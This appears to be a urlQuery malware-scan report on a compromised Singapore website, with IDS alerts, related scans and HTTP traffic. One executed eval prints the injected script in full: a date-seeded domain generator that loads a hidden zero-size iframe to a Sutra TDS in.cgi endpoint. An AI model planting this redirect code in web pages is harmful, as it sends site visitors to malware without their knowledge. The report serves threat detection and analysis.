Overview

URLhttp://rems.com.sg/
IP118.139.185.1
ASNAS26496 GoDaddy.com, LLC
Location Singapore
Report completed2012-11-08 14:15:23 CET
StatusLoading report..
urlQuery Alerts Detected a Dynamic DNS URL
Detected SutraTDS URL pattern


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-08 14:14:50 118.139.185.1 urlQuery Client1ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 3)
2012-11-08 14:14:50 118.139.185.1 urlQuery Client1ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 3)
2012-11-08 14:14:50 118.139.185.1 urlQuery Client1ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 3)
2012-11-08 14:14:52 urlQuery Client 31.148.219.62ET CURRENT_EVENTS TDS Sutra - request in.cgi
Snort /w Sourcefire VRT
Timestamp Source IP Destination IP Severity Alert
2012-11-08 14:14:51 urlQuery Client 31.148.219.61MALWARE-CNC TDS Sutra - request in.cgi


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 118.139.185.1

Date Alerts / IDS URL IP
2013-02-10 19:42:303 / 13http://rems.com.sg/118.139.185.1
2013-02-02 05:30:340 / 2http://foreverandadaymusical.com/332.jar118.139.185.1
2013-01-29 00:58:060 / 2http://foreverandadaymusical.com/887.jar118.139.185.1
2013-01-27 18:53:370 / 2http://foreverandadaymusical.com/887.jar118.139.185.1
2013-01-14 15:27:360 / 0http://xemtuong.net/118.139.185.1
2013-01-07 11:55:540 / 0http://xemtuong.net118.139.185.1

Last 6 reports on ASN: AS26496 GoDaddy.com, LLC

Date Alerts / IDS URL IP
2013-02-15 16:55:570 / 3http://mkvrpknidkurcrftiqsfjqdxbn.com/mgfKT3XV0yKTdj0xLjEmaWQ9MzY2ODUwMjk4OCZhaWQ9MzA1NTkmc2lkP (...)50.62.12.103
2013-02-15 16:55:530 / 0http://188.121.45.64188.121.45.64
2013-02-15 16:54:590 / 3http://mkvrpknidkurcrftiqsfjqdxbn.com/fQfHJ1RX86mbdj0xLjEmaWQ9MTk3OTM2ODgwJmFpZD0zMDU1OSZzaWQ9M (...)50.62.12.103
2013-02-15 16:54:050 / 1http://fashionenigma.com/images/logos.gif?199ba=41956097.74.144.31
2013-02-15 16:53:430 / 1http://fashionenigma.com/images/logos.gif?20c08=80491297.74.144.31
2013-02-15 16:53:360 / 1http://fashionenigma.com/images/logos.gif?1e396=12379897.74.144.31

Last 6 reports on domain: rems.com.sg

Date Alerts / IDS URL IP
2013-02-10 19:42:303 / 13http://rems.com.sg/118.139.185.1
2012-12-05 19:14:523 / 11http://rems.com.sg/118.139.185.1
2012-12-04 08:31:333 / 13http://rems.com.sg/118.139.185.1
2012-12-03 17:02:353 / 15http://rems.com.sg/118.139.185.1
2012-12-02 14:03:382 / 4http://rems.com.sg/118.139.185.1
2012-11-29 00:43:292 / 9http://rems.com.sg/118.139.185.1



JavaScript

Executed Scripts (31)


Executed Evals (2)

#1 JavaScript::Eval (size: 6542, repeated: 1)

(function($) {
    $.fn.formHighlighter = function(elementStyles) {
        var element = this;
        var opts = $.extend({}, $.fn.formHighlighter.defaults, elementStyles);
        $(document).ready(function() {
            $(element).find("input[type=text],input[type=password],input[type=email],input[type=url],input[type=number],input[type=range],input[type=search],input[type=color],input[type='Date picker'],textarea").each(function() {
                var standardValue = $(this).attr("value");
                var standardName = $(this).attr("name");
                if ($(this).is("input[type=text],input[type=password],input[type=email],input[type=url],input[type=number],input[type=range],input[type=search],input[type=color],input[type='Date picker'],textarea")) {
                    if (placeholderSupport("input", "placeholder") == true && opts.clearField == true) {
                        $(this).attr("placeholder", standardValue).attr("value", "").removeClass(opts.classFocus).removeClass(opts.classBlur).removeClass(opts.classKeyDown).removeClass(opts.classNotEqualToDefault).addClass(opts.classBlur);
                        if ($(this).is("textarea")) {
                            $(this).text("")
                        }
                    } else {
                        $(this).attr("ref", standardValue);
                        if (opts.classBlur != "") {
                            $(this).removeClass(opts.classFocus).removeClass(opts.classBlur).removeClass(opts.classKeyDown).removeClass(opts.classNotEqualToDefault).addClass(opts.classBlur)
                        }
                    }
                }
                if ($(this).is("input[type=password]")) {
                    $(this).attr("ref", standardValue);
                    $(this).attr("temp", "");
                    if (opts.classBlur != "") {
                        $(this).removeClass(opts.classFocus).removeClass(opts.classBlur).removeClass(opts.classKeyDown).removeClass(opts.classNotEqualToDefault).addClass(opts.classBlur)
                    }
                    $(this).hide();
                    var MainClass = $(this).attr("class");
                    var MainId = $(this).attr("id") + " " + standardName;
                    $(this).after($("<input>").attr("type", "text").attr("name", standardName + "_temp").attr("ref", standardValue).attr("typecheck", "password").attr("value", standardValue).attr("class", MainClass).attr("id", MainId).attr("autocomplete", "off").focus(function() {
                        focusHandler(this)
                    }).blur(function() {
                        blurHandler(this)
                    }))
                }
                $(this).focus(function() {
                    focusHandler(this)
                });

                function focusHandler(obj) {
                    if ($(obj).val() == $(obj).attr("ref") || $(obj).val() == $(obj).attr("placeholder") || $(obj).val() == "") {
                        var name = $(obj).attr("name");
                        if (opts.clearField == true) {
                            if (placeholderSupport("input", "placeholder") == true) {
                                if (opts.classFocus != "") {
                                    $(obj).removeClass(opts.classFocus).removeClass(opts.classBlur).removeClass(opts.classKeyDown).removeClass(opts.classNotEqualToDefault).addClass(opts.classFocus)
                                }
                                $(obj).val("")
                            } else {
                                $(obj).val("");
                                if (opts.classFocus != "") {
                                    $(obj).removeClass(opts.classFocus).removeClass(opts.classBlur).removeClass(opts.classKeyDown).removeClass(opts.classNotEqualToDefault).addClass(opts.classFocus)
                                }
                            }
                        } else {
                            var webkit = false;
                            if ($.browser.webkit) {
                                webkit = true
                            }
                            moveCursorToBegining(obj, name, webkit, $(obj).attr("type"));
                            if (opts.classFocus != "") {
                                $(obj).removeClass(opts.classFocus).removeClass(opts.classBlur).removeClass(opts.classKeyDown).removeClass(opts.classNotEqualToDefault).addClass(opts.classFocus)
                            }
                        }
                    }
                    if (opts.onFocus != null) {
                        var onFocus = opts.onFocus ||
                        function() {};
                        $(obj).each(onFocus)
                    }
                    $(obj).keypress(function(event) {
                        if ($(obj).is("input[typecheck=password]")) {
                            var masterIDHolder = $(obj).attr("name");
                            var masterID = masterIDHolder.replace(/_temp/, "");
                            if ($.browser.msie || $.browser.opera) {
                                if (_char != "") {
                                    var _char = String.fromCharCode(event.keyCode)
                                }
                                $(obj).remove();
                                $("input[name=" + masterID + "]").css("display", "inline").focus().removeClass(opts.classFocus).removeClass(opts.classBlur).removeClass(opts.classKeyDown).addClass(opts.classKeyDown).removeClass(opts.classNotEqualToDefault).val("");
                                if ($.browser.msie) {
                                    $("input[name=" + masterID + "]").val(_char)
                                }
                            } else {
                                if (_char != "") {
                                    var _char = String.fromCharCode(event.charCode)
                                }
                                $(obj).remove();
                                $("input[name=" + masterID + "]").css("display", "inline").removeClass(opts.classFocus).removeClass(opts.classBlur).removeClass(opts.classKeyDown).removeClass(opts.classNotEqualToDefault).addClass(opts.classKeyDown).val("").focus();
                                if (!$.browser.webkit) {
                                    $("input[name=" + masterID + "]").val(_char)
                                }
                            }
                        } else {
                            if ($(obj).val() == $(obj).attr("ref") || $(obj).val() == "") {
                                $(obj).val("");
                                if (opts.classKeyDown != "") {
                                    $(obj).removeClass(opts.classFocus).removeClass(opts.classBlur).removeClass(opts.classKeyDown).removeClass(opts.classNotEqualToDefault).addClass(opts.classKeyDown)
                                }
                            }
                        }
                    })
                }
                $(this).blur(function() {
                    blurHandler(this)
                });

                function blurHandler(obj) {
                    if ($(obj).is("input[type=password]")) {
                        if ($(obj).val() == "") {
                            $(obj).hide();
                            var MainClass = $(obj).attr("class");
                            var MainId = $(obj).attr("id") + " " + standardName;
                            $(obj).after($("<input>").attr("type", "text").attr("name", standardName + "_temp").attr("ref", standardValue).attr("typecheck", "password").attr("value", standardValue).attr("class", MainClass).attr("id", MainId).attr("autocomplete", "off").focus(function() {
                                focusHandler(this)
                            }).blur(function() {
                                blurHandler(this)
                            }))
                        }
                    } else {
                        if ($(obj).val() == "") {
                            $(obj).val($(obj).attr("ref"))
                        }
                    }
                    if (opts.classBlur != "") {
                        $(obj).removeClass(opts.classBlur).removeClass(opts.classKeyDown).removeClass(opts.classFocus).removeClass(opts.classNotEqualToDefault).addClass(opts.classBlur)
                    }
                    if (opts.classNotEqualToDefault != "" && $(obj).val() != $(obj).attr("ref") && opts.clearField == false) {
                        $(obj).removeClass(opts.classFocus).removeClass(opts.classBlur).removeClass(opts.classKeyDown).removeClass(opts.classNotEqualToDefault).addClass(opts.classNotEqualToDefault)
                    }
                    if (placeholderSupport("input", "placeholder") == true && opts.clearField == true && opts.classNotEqualToDefault != "" && $(obj).val() != $(obj).attr("placeholder") && $(obj).val() != "") {
                        $(obj).removeClass(opts.classFocus).removeClass(opts.classBlur).removeClass(opts.classKeyDown).removeClass(opts.classNotEqualToDefault).addClass(opts.classNotEqualToDefault)
                    }
                    if (opts.onBlur != null) {
                        var onBlur = opts.onBlur ||
                        function() {};
                        $(obj).each(onBlur)
                    }
                }
            })
        })
    };
    $.fn.formHighlighter.defaults = {
        classFocus: '',
        classBlur: '',
        classKeyDown: '',
        classNotEqualToDefault: '',
        onBlur: null,
        onFocus: null,
        onKeypress: function() {},
        clearField: false
    }
})(jQuery);

function moveCursorToBegining(obj, name, webkit, type) {
    if (obj.createTextRange) {
        obj.focus();
        var selRange = obj.createTextRange();
        selRange.collapse(true);
        selRange.moveStart("character", 0);
        selRange.select()
    } else if (obj.setSelectionRange) {
        var objForm = document.forms[0].name;
        var objName = name;
        if (webkit) {
            setTimeout(function() {
                setRange(obj, type)
            }, 10)
        } else {
            obj.setSelectionRange(0, 0)
        }
    } else {
        if (obj.selectionStart) {
            obj.focus();
            obj.selectionStart = 0
        }
        obj.focus()
    }
}
function setRange(obj, type) {
    obj.focus();
    if (type === "password") {
        obj.setSelectionRange(1, 1)
    } else {
        obj.setSelectionRange(1, 0)
    }
}
function placeholderSupport(element, attribute) {
    var _temp = document.createElement(element);
    if (attribute in _temp) {
        return true
    } else {
        return false
    }
}

#2 JavaScript::Eval (size: 1781, repeated: 9)

function nextRandomNumber() {
    var hi = this.seed / this.Q;
    var lo = this.seed % this.Q;
    var test = this.A * lo - this.R * hi;
    if (test > 0) {
        this.seed = test;
    } else {
        this.seed = test + this.M;
    }
    return (this.seed * this.oneOverM);
}

function RandomNumberGenerator(unix) {
    var d = new Date(unix * 1000);
    var s = Math.ceil(d.getHours() / 3);
    this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
    this.A = 48271;
    this.M = 2147483647;
    this.Q = this.M / this.A;
    this.R = this.M % this.A;
    this.oneOverM = 1.0 / this.M;
    this.next = nextRandomNumber;
    return this;
}

function createRandomNumber(r, Min, Max) {
    return Math.round((Max - Min) * r.next() + Min);
}

function generatePseudoRandomString(unix, length, zone) {
    var rand = new RandomNumberGenerator(unix);
    var letters = "qmahgwctopfjilrfpjrfcwgewheizwdw".split('');
    var str = '';
    for (var i = 0; i < length; i++) {
        str += letters[createRandomNumber(rand, 0, letters.length - 1)];
    }
    return str + '.' + zone;
}

setInterval(function() {
    try {
        if (typeof iframeWasCreated == "undefined") {
            var unix = Math.round(+new Date() / 1000);
            var domainName = generatePseudoRandomString(unix, 16, 'mynumber.org');
            ifrm = document.createElement("IFRAME");
            ifrm.setAttribute("src", "http://" + domainName + "/in.cgi?14");
            ifrm.style.width = "0px";
            ifrm.style.height = "0px";
            ifrm.style.visibility = "hidden";
            document.body.appendChild(ifrm);
            iframeWasCreated = true;
        }
    } catch (e) {
        iframeWasCreated = undefined;
    }
}, 100);

Executed Writes (0)



HTTP Transactions (92)


Request Response
GET / HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html
Date: Thu, 08 Nov 2012 13:14:47 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 5181
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /css?family=Arimo:400,700|Basic|Aladin HTTP/1.1

Host: fonts.googleapis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: text/css
Expires: Thu, 08 Nov 2012 13:14:48 GMT
Date: Thu, 08 Nov 2012 13:14:48 GMT
Cache-Control: private, max-age=86400
Content-Encoding: gzip
Content-Length: 347
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
GET /ajax/libs/jquery/1.6.4/jquery.min.js HTTP/1.1

Host: ajax.googleapis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Content-Encoding: gzip
Last-Modified: Mon, 02 Apr 2012 18:24:28 GMT
Date: Wed, 07 Nov 2012 20:35:01 GMT
Expires: Thu, 07 Nov 2013 20:35:01 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 32103
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 59987
GET /style.css HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 13:14:48 GMT
Server: Apache
Last-Modified: Sat, 29 Sep 2012 07:48:36 GMT
Etag: &quot;1073ab9-5627-4cad266669a52&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4931
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /css/menu-style.css HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 13:14:48 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:35 GMT
Etag: &quot;3dfa2f8-cc3-4c52abbba5016&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 856
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /css/slider.css HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 13:14:48 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:42 GMT
Etag: &quot;3dfa2fd-aac-4c52abc1bbbfa&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1022
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /js/jquery.hoverIntent.minified.js HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Thu, 08 Nov 2012 13:14:48 GMT
Server: Apache
Last-Modified: Wed, 07 Nov 2012 12:29:06 GMT
Etag: &quot;58d43a0-1f57-4cde6dd512108&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2446
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /images/favicon.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:48 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:35 GMT
Etag: &quot;56516a2-544-4c52ab824ec2d&quot;
Accept-Ranges: bytes
Content-Length: 1348
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /fonts/font.css HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 13:14:48 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:31 GMT
Etag: &quot;22c8cba-189-4c52abb7e1f39&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 161
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /js/jquery.simplyscroll-1.0.4.js HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Thu, 08 Nov 2012 13:14:49 GMT
Server: Apache
Last-Modified: Wed, 07 Nov 2012 12:29:14 GMT
Etag: &quot;31a8ca4-3611-4cde6ddcb150f&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4266
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /js/jquery.menu.1.3.3.js HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Thu, 08 Nov 2012 13:14:49 GMT
Server: Apache
Last-Modified: Wed, 07 Nov 2012 12:29:09 GMT
Etag: &quot;31a8ca0-3406-4cde6dd8c7ad3&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3836
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /css/jquery.simplyscroll-1.0.4.css HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 13:14:49 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:35 GMT
Etag: &quot;3dfa2f7-12ee-4c52abbb64152&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1365
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /js/slides.min.jquery.js HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Thu, 08 Nov 2012 13:14:49 GMT
Server: Apache
Last-Modified: Wed, 07 Nov 2012 12:29:24 GMT
Etag: &quot;317a9e-3391-4cde6de6c6243&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4104
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /js/jquery.formHighlighter.js HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Thu, 08 Nov 2012 13:14:49 GMT
Server: Apache
Last-Modified: Wed, 07 Nov 2012 12:29:28 GMT
Etag: &quot;58d439f-28b3-4cde6dea8f0d3&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3526
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /js/jquery-1.6.min.js HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Thu, 08 Nov 2012 13:14:48 GMT
Server: Apache
Last-Modified: Wed, 07 Nov 2012 12:29:36 GMT
Etag: &quot;35c6d83-17aa7-4cde6df1d2458&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 33417
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /css/screen.css HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 13:14:49 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:38 GMT
Etag: &quot;3dfa2fa-c3-4c52abbe7666f&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 103
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /js/jquery.metadata.js HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Thu, 08 Nov 2012 13:14:49 GMT
Server: Apache
Last-Modified: Wed, 07 Nov 2012 12:29:42 GMT
Etag: &quot;31a8ca2-2884-4cde6df75aad1&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3272
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /js/jquery.min.js HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Thu, 08 Nov 2012 13:14:49 GMT
Server: Apache
Last-Modified: Wed, 07 Nov 2012 12:29:20 GMT
Etag: &quot;31a8ca3-17f25-4cde6de286185&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 33870
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /js/jquery.validate.js HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Thu, 08 Nov 2012 13:14:49 GMT
Server: Apache
Last-Modified: Wed, 07 Nov 2012 12:29:47 GMT
Etag: &quot;31a8ca5-aa2d-4cde6dfc6ab49&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 11651
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /images/logo.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:50 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:42 GMT
Etag: &quot;56516ae-172b-4c52ab890f244&quot;
Accept-Ranges: bytes
Content-Length: 5931
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /css/reset.css HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/css/screen.css
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 13:14:50 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:35 GMT
Etag: &quot;3dfa2f9-13a-4c52abbbd74e0&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 188
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /css/core.css HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
